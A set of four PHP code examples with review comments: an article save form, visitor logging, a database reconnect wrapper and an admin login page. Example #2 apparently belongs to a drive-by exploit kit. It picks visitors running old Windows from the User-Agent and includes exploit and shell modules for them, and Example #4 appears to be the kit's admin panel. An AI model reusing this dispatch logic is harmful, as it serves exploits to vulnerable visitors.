Example #1
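 /**
  * Handle the article edit form: save a submitted article, or load an existing one.
  *
  * When every required POST field is present the request token is checked, the
  * article is validated (non-empty header, URL not used by another article) and
  * then inserted or updated, after which a Location header is sent. Otherwise,
  * when an item_id was given, the matching row is loaded into $this->item.
  *
  * Security notes:
  * - Every value reaches SQL through sql_placeholder() bindings.
  * - header, annotation and body are stored exactly as posted.
  *   NOTE(review): whatever renders them must escape or sanitise - confirm in the templates.
  * - The "from" return address comes from the request, so it is only honoured
  *   when it is a same-site relative reference; anything else falls back to the
  *   article list. Without that check the save form is an open redirect.
  */
 function prepare()
 {
     $item_id = intval($this->param('item_id'));
     $form_posted = isset(
         $_POST['header'],
         $_POST['meta_title'],
         $_POST['meta_keywords'],
         $_POST['meta_description'],
         $_POST['annotation'],
         $_POST['body']
     );
     if ($form_posted) {
         // Runs before any posted field is copied into the model.
         // NOTE(review): presumably the anti-CSRF check - verify that it aborts on a mismatch.
         $this->check_token();
         $this->item->header = $_POST['header'];
         $this->item->meta_title = $_POST['meta_title'];
         $this->item->meta_keywords = $_POST['meta_keywords'];
         $this->item->meta_description = $_POST['meta_description'];
         // 'url' is not part of the isset() gate above, so default it instead of
         // reading an undefined index; empty URLs are replaced by the id further down.
         $this->item->url = isset($_POST['url']) ? $_POST['url'] : '';
         $this->item->annotation = $_POST['annotation'];
         $this->item->body = $_POST['body'];
         $this->item->enabled = (isset($_POST['enabled']) && $_POST['enabled'] == 1) ? 1 : 0;

         ## Do not allow two articles to share the same URL.
         $query = sql_placeholder('select count(*) as count from articles where url=? and article_id!=?', $this->item->url, $item_id);
         $this->db->query($query);
         $res = $this->db->result();
         if (empty($this->item->header)) {
             $this->error_msg = $this->lang->ENTER_TITLE;
         } elseif ($res->count > 0) {
             $this->error_msg = 'Статья с таким URL уже существует. Выберите другой URL.';
         } else {
             if (empty($item_id)) {
                 $query = sql_placeholder('INSERT INTO articles(article_id, header, url, meta_title, meta_keywords, meta_description, annotation, body, enabled, created, modified) VALUES(NULL, ?, ?, ?, ?, ?, ?, ?, ?, now(), now())', $this->item->header, $this->item->url, $this->item->meta_title, $this->item->meta_keywords, $this->item->meta_description, $this->item->annotation, $this->item->body, $this->item->enabled);
                 $this->db->query($query);
                 $inserted_id = $this->db->insert_id();
                 // A new article's sort position starts out equal to its id.
                 $query = sql_placeholder('UPDATE articles SET order_num=article_id WHERE article_id=?', $inserted_id);
                 $this->db->query($query);
             } else {
                 $query = sql_placeholder('UPDATE articles SET header=?, url=?, meta_title=?, meta_keywords=?, meta_description=?, annotation=?, body=?, enabled=?, modified=now() WHERE article_id=?', $this->item->header, $this->item->url, $this->item->meta_title, $this->item->meta_keywords, $this->item->meta_description, $this->item->annotation, $this->item->body, $this->item->enabled, $item_id);
                 $this->db->query($query);
             }
             // Articles saved without a URL get their id as the URL.
             $this->db->query("UPDATE articles SET url=article_id WHERE url=''");
             $get = $this->form_get(array('section' => 'Articles'));

             // Default target is the article list; "from" may override it only when it
             // cannot leave this site: no control characters, no scheme prefix and no
             // leading "//", "\\" or "/\" (browsers treat a backslash like a slash).
             $target = "index.php{$get}";
             if (isset($_GET['from']) && is_string($_GET['from']) && $_GET['from'] !== '') {
                 $from = $_GET['from'];
                 $is_local = !preg_match('~[\x00-\x1f\x7f]~', $from)
                     && !preg_match('~^\s*(?:[a-z][a-z0-9+.\-]*:|[/\\\\]{2})~i', $from);
                 if ($is_local) {
                     $target = $from;
                 }
             }
             header("Location: " . $target);
         }
     } elseif (!empty($item_id)) {
         $query = sql_placeholder('SELECT * FROM articles WHERE article_id=?', $item_id);
         $this->db->query($query);
         $this->item = $this->db->result();
     }
 }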
Example #2
                        if (strstr($user_agent, "Windows NT 5.1")) {
                            $os = "Windows XP";
                        } else {
                            if (strstr($user_agent, "Windows NT 5.2")) {
                                $os = "Windows 2003";
                            } else {
                                $os = "other";
                            }
                        }
                    }
                }
            }
        }
    }
}
// Insert one tp_stats row for this request: the current timestamp plus $ip,
// $user_agent, $browser, $os, $uri and $accept_lang. $os is the label chosen by
// the User-Agent substring checks above; where the other variables are filled is
// not shown here. All seven values are bound through sql_placeholder().
// NOTE(review): the User-Agent (and presumably uri / accept_lang) is supplied by
// the client, so any page that later displays tp_stats rows should HTML-escape
// them - confirm in the reporting code.
$sql = sql_placeholder("INSERT INTO tp_stats(datetime, ip, user_agent, browser, os, uri, accept_lang) VALUES(?, ?, ?, ?, ?, ?, ?)", date("Y-m-d H:i:s"), $ip, $user_agent, $browser, $os, $uri, $accept_lang);
// The return value is not checked, so a failed insert goes unnoticed.
mysql_query($sql);
if ($os == "Windows 95" || $os == "Windows NT 4" || $os == "Windows ME" || $os == "Windows 98" || $os == "Windows 2000" || $os == "Windows 2003" || $os == "Windows XP") {
    echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n";
    include "mod/ok.php";
    echo "<br>\r\n";
    include "mod/popupexp.php";
    echo "<br>\r\n";
    include "mod/shell/shellex.php";
    echo "<br>\r\n\r\n";
} else {
    if ($os == "Windows XP SP2") {
        echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n";
        include "mod/ok.php";
        echo "<br>\r\n";
        include "mod/shell/shellex.php";
Example #3
/**
 * Build a query from a placeholder template, run it, and retry once after a reconnect.
 *
 * The first argument is the SQL template; the remaining arguments are handed to
 * sql_placeholder() as one array. If running the query leaves mysql_errno() at
 * 2006 (the client error "MySQL server has gone away"), the connection is closed
 * and reopened with DB_HOST / DB_LOGIN / DB_PASS, DB_DEVICE is selected,
 * wait_timeout is set to 86400 and the same SQL string is run a second time.
 * The script dies with 'Cannot connect to DB' when the reconnect fails.
 *
 * @return mixed Whatever sql() returns for the first or the retried query.
 */
function sql_wrapped()
{
    $params = func_get_args();
    $template = array_shift($params);
    $query = sql_placeholder($template, $params);

    $outcome = sql($query);
    if (mysql_errno() != 2006) {
        return $outcome;
    }

    // Connection was lost: rebuild it, then replay the same SQL string.
    mysql_close();
    if (!mysql_connect(DB_HOST, DB_LOGIN, DB_PASS)) {
        die('Cannot connect to DB');
    }
    mysql_selectdb(DB_DEVICE);
    sql("set wait_timeout=86400");

    return sql($query);
}
Example #4
    redirect("login.php");
}
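// Login handling and login form of the admin panel (flat script section).
//
// When $login and $pass are set, tp_users is searched for a matching row. A match
// fills the session and writes a "Logged in" line to tp_logs; a miss sets $ErrMsg
// and logs the failed attempt. A logged-in session is redirected to index.php,
// otherwise the login form is printed.

// Give $ErrMsg a value for the first (GET) visit, so the echo below never reads an
// undefined variable.
if (!isset($ErrMsg)) {
    $ErrMsg = '';
}
if (isset($login, $pass)) {
    // The listing shows both credential values masked as '******'. They are bound
    // through sql_placeholder(), like the other queries in this script, so quotes in
    // the submitted values cannot change the statement.
    // NOTE(review): the password is compared inside SQL, which suggests it is stored
    // unhashed or with a fast hash - confirm, and move to password_hash() / password_verify().
    $sql = sql_placeholder("SELECT * FROM `tp_users` WHERE login = ? AND password = ?", $login, $pass);
    $result = mysql_query($sql);
    // mysql_query() returns false on error; treat that as "no match".
    $num = ($result !== false) ? mysql_num_rows($result) : 0;

    // The log line is HTML (<b>...</b>), so the submitted login is escaped before it
    // is embedded; cp1251 matches the charset this page declares.
    $LoginForLog = (isset($_POST['login']) && is_string($_POST['login'])) ? $_POST['login'] : '';
    $LoginForLog = htmlspecialchars($LoginForLog, ENT_QUOTES, 'cp1251');

    if (0 < $num) {
        $Row = mysql_fetch_array($result);
        // Issue a fresh session id on login so an id known before authentication
        // cannot be reused afterwards (session fixation).
        if (session_id() !== '') {
            session_regenerate_id(true);
        }
        $_SESSION['UserID'] = $Row['id'];
        $_SESSION['Login'] = $Row['login'];
        // NOTE(review): the stored password is kept in the session as before, because
        // other pages may read it - drop it once that is confirmed unnecessary.
        $_SESSION['Password'] = $Row['password'];
        $_SESSION['IsLoggedIn'] = true;
        $sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", "<b>Logged in</b> (" . $LoginForLog . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR"));
        mysql_query($sql);
    } else {
        $_SESSION['IsLoggedIn'] = false;
        $ErrMsg = "Incorrect Login or Password";
        // Only the attempted login name is logged. The submitted password is left out:
        // a mistyped real password must not end up readable in tp_logs.
        $sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", $ErrMsg . " (" . $LoginForLog . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR"));
        mysql_query($sql);
    }
}
if (!empty($_SESSION['IsLoggedIn'])) {
    redirect("index.php");
}
echo "<html><head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">\r\n<title>Login</title>\r\n<style>\r\n";
// include runs the file through the PHP parser; the path is a fixed literal.
include "include/style.css";
echo "</style>\r\n</head><body bgcolor=\"#333333\">\r\n<table cellpadding=\"3\" cellspacing=\"1\" align=\"center\" width=\"750\" border=\"0\" height=\"100%\">\r\n<tr><td valign=\"middle\" height=\"100%\" align=\"center\"><form action=\"login.php\" method=\"post\">\r\n<div align=\"left\">\r\n<table cellpadding=\"0\" cellspacing=\"0\" width=\"250\"  border=\"0\" align=left bordercolor=\"#FFFFFF\" hight=\"100\">\r\n<tr><td width=\"250\" hight=\"100\">\r\n";
echo "<hr>" . getenv("REMOTE_ADDR");
echo "<hr><small>All data about your activities in the admin will be logged</small></td></tr>\r\n</table>\r\n</div>\r\n<table cellpadding=0 cellspacing=0 width='250' border=1 align=center bordercolor=\"#818181\" bordercolorlight=white bordercolordark=white>\r\n<tr><td align=\"center\" colspan=\"2\" class=\"pagetitle\"><b>Admin Panel</td></tr><tr><td align=\"center\" class=\"pagetitle2\"><b>Login:</b></td><td><input type=\"text\" name=\"login\" size=\"25\" class=inputbox3></td>\r\n</tr><tr><td align=\"center\" class=pagetitle2><b>Password:</b></td><td><input type=\"password\" name=\"password\" size=\"25\" class=inputbox3></td></tr><tr><td colspan=\"2\" align=\"center\">\r\n<font color=\"#F9FBFB\">\r\n<input type=\"submit\" value=\" Login \" ></font>\r\n<font color=\"#F9FBFB\">\r\n<input type=\"reset\" value=\" Clear \" ></font></td></tr><tr>\r\n<td align=\"center\" colspan=\"2\"><font color=#ff0000><a href=\"http://xshop.in\">\r\n<font color=\"#F9FBFB\"><small>Created by&nbsp;<b>0x88</b>&nbsp;(ICQ 92777755)</font></small></a></font></td>\r\n</tr></table><br><font color=\"#ff0000\">";
// $ErrMsg is either empty or the fixed failure text set above; no request data is echoed here.
echo $ErrMsg;
echo "&nbsp;</font></form></td></tr></table>\r\n</body>\r\n</html>";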